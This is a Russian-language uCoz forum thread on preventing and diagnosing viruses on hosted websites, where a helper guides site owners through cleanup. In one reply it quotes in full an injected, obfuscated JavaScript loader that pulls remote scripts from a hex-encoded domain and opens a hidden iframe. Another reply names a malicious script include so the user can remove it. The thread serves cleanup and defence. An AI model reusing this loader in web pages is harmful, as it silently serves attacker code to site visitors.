Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1936 | 16:24:23
    SportPRO, это скорее вопрос к тех.поддержке аваста. прочитайте их ответ //forum.ucoz.ru/forum/45-34556-1268615-16-1444049059 как только они все исправят, сайт блокироваться не будет

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    SportPRO
    Сообщений: 6
    Репутация: 0

    Сообщение # 1937 | 16:25:55
    Отключил avast - сайт заработал. через минуту включил антивирус - к счастью все, кажется, работает.
    elenus
    Сообщений: 3
    Репутация: 0
    Уровень замечаний:

    Сообщение # 1938 | 00:46:50
    Здравствуйте!

    Реклама uKit, содержащая вирус, вот скриншоты по сайту Психон-душа http://psichosis.ru - http://dfiles.ru/files/0wv6fuzpf?redirect и http://prntscr.com/8oiczk. Проверьте, пожалуйста, эту рекламу uKit http://dfiles.ru/files/0wv6fuzpf?redirect на наличие вирусов, но вроде бы Троян.

    С Уважением,
    Елена
    Abezgauz
    Сообщений: 18
    Репутация: 29

    Сообщение # 1939 | 14:06:42
    elenus, данный сайт http://psichosis.ru находится в uCoz.
    С данным вопросом, пожалуйста, обратитесь в техническую поддержку uCoz через Панель управления сайтом - Верхний бар - Помощь: Служба поддержки.

    Консультирую: по uWeb, по ulCraft uKit.

    Официальный блог uWeb
    uWeb ВКонтакте
    babouchka
    Сообщений: 2
    Репутация: 3

    Сообщение # 1940 | 22:59:27
    Здравствуйте!
    Сайт http://babouchka.at.ua/ незарегистрированные посетители сайта на главной странице видят рекламу различного содержания на весь экран. Реклама не закрывается. Или сайт блокируется антивирусом. Какие антивирусы блокируют не могу сказать, не сообщили. Что делать?
    Спасибо.

    ___________________________________
    Не ошибается тот, кто ничего не делает...
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1941 | 23:02:42
    babouchka, удалите свои соц. кнопки, а именно код
    Код
    <script type="text/javascript" src="http://jquery-library.ru/jl.php?share=7,24,41&size=32"></script>

    после удаления проверьте сайт снова, если что-то останется предоставьте скриншоты останков

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    babouchka
    Сообщений: 2
    Репутация: 3

    Сообщение # 1942 | 23:22:14
    Цитата webanet ()
    babouchka, удалите свои соц. кнопки, а именно код <script type="text/javascript" src="http://jquery-library.ru/jl.php?share=7,24,41&size=32"></script>1

    после удаления проверьте сайт снова, если что-то останется предоставьте скриншоты останков


    Удалила. Все нормально. СПАСИБО!!!!!!!!!!

    ___________________________________
    Не ошибается тот, кто ничего не делает...
    Администратор4946
    Сообщений: 6
    Репутация: 0

    Сообщение # 1943 | 09:17:59
    Здравствуйте, на странице, при скачивании файлов, открывается рекламный вирус http://chebdetsad113.ucoz.ru/index....-11. Что делать?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1944 | 09:24:57
    Администратор4946, панель управления - редактор страниц - управление страницами сайта - образование - напротив страницы нажмите на разводной ключ - страница откроется на редактирование - поиском браузера ищите cs8gc1senu
    и удаляйте эту конструкцию
    Код
    <script>window.a1336404323 = 1;!function(){var e=JSON.parse('["63733867633173656e752e7275"]'),t="21154",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="COOKIELIFE";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "chebdetsad113.ucoz.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("COOKIELIFE")}),c(u,function(){o("a2519043306")!=f&&(n("a2519043306",f,{expires:parseInt("COOKIELIFE")}),i("ta2519043306"))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script><iframe id="a1996667054" src="//cs8gc1senu.ru/f.html" style="display: none;"></iframe>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Komoff
    Сообщений: 595
    Репутация: 276

    Сообщение # 1945 | 14:13:16
    Может немного не по теме, но надеюсь на опыт многоуважаемой Ирины в таких вопросах. Столкнулся с паранойей от аваста, зарегил домен, вроде бы без бурной истории, но ещё на стадии прикрепления домена в ПУ, аваст стал визжать о вирусах. В итоге наглухо блокировал доступ по домену. Я конечно добавил URL в исключения и он отстал, правда, хотелось бы чтобы он не отрезал от сайта своих клиентов и моих пользователей, поэтому послал конечно же сообщение о ложной тревоге, в общем-то уже три раза отсылал, толку пока нет. Но даже с добавленным в исключения сайтом, аваст все равно визжит на мини-чат на главной страницы (скорей всего на его вывод через iframe), но ругается не на сам сайт, а на браузер (Firefox), причем на мини-чат на других сайтах совсем не реагирует, только на моем. При просмотре с IE и скорей всего других браузеров, он молчит. Что делать, как отучить аваст ругаться на мой сайт? Сайт http://forchat.ru (скрины прикрепил)
    Прикрепления: 2873834.jpg(61.2 Kb) · 0189922.jpg(188.3 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1946 | 14:40:46
    Komoff, а что ту было? почему 404 дырка? удаляли что-то? в любом случае домен в черном списке аваста. если посылали сообщение о фолсе путем нажатия на рыжую кнопку, то это бесполезно. надо писать в тех.поддержку аваста. если сам аваст русишный, то ещё и писать на форум аваста https://forum.avast.com/index.php?board=28.0 и там сообщать о фолсе переданным с доменом
    Цитата
    При просмотре с IE и скорей всего других браузеров, он молчит.
    последний раз аваст держала в руках давно, но то что вас блочит срабатывает онлайн сервис (не вспомню как называется) в мозиллу встраивается, в хром идет, а с ослом не контактирует.

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Komoff
    Сообщений: 595
    Репутация: 276

    Сообщение # 1947 | 14:57:08
    Цитата webanet ()
    а что ту было? почему 404 дырка? удаляли что-то?
    В смысле? У меня не показывает нечего такого...
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1948 | 14:59:02
    Komoff, в смысле нашла в коде сайта 404 скрипт
    Цитата
    <script type="text/javascript">new _uSuggestList('suggList','suggEdit',{separator:',',colwidth:['100%'],url:'/feat/?a=1'});</script>
    <script type="text/javascript" src="/diz/js/script.js"></script>
    теперь и спрашиваю были ли удаления скриптов в файловом

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Komoff
    Сообщений: 595
    Репутация: 276

    Сообщение # 1949 | 15:06:24
    webanet, а! Спасибо, да притянул с другого сайта случайно, а скрипт забыл добавить.)) Убрал.
    AOV
    Сообщений: 65
    Репутация: 6

    Сообщение # 1950 | 20:51:02
    Пользователи жалуются, что с сайта http://tehnologiya.ucoz.ru идёт вирус :weep:
    Подскажите, пожалуйста, что надо сделать...
    Сообщение отредактировал AOV - Четверг, 19 Ноя 2015, 20:51:42
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: